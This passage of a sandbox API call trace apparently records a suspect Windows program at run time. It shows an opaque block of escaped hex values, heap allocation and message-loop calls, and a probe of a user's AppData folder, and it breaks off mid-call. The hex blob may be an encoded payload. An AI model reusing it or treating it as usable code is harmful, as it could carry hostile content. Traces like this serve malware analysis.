4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0208.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0208.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0208.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0208.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0208.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0208.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0208.286] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0208.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0208.286] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0208.286] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0208.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0208.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0208.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0208.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0208.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0208.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0208.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0208.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0208.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0208.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0208.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0208.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0208.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0208.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0208.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0208.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0208.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0208.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0208.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0208.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0208.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0208.287] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0208.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0208.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0208.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0208.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0208.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0208.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0208.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0208.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0208.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0208.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0208.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0208.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0208.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0208.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0208.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0208.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0208.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0208.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0208.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa) returned 0x34aa580 [0208.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0208.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0208.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0208.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0208.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0208.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0208.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0208.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0208.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0208.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0208.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0208.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0208.289] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0208.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0208.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0208.289] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0208.289] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0208.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0208.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7f0 [0208.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0208.289] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0208.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0208.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa808 [0208.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0208.289] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0208.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0208.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0208.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0208.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0208.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0208.290] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0208.290] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.290] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0208.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0208.290] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0208.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0208.290] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0208.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0208.290] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0208.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0208.290] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Apps", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdd052f, dwReserved1=0x777f, cFileName="Apps", cAlternateFileName="")) returned 0xaa58a0 [0208.290] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0208.291] PeekMessageW (in: 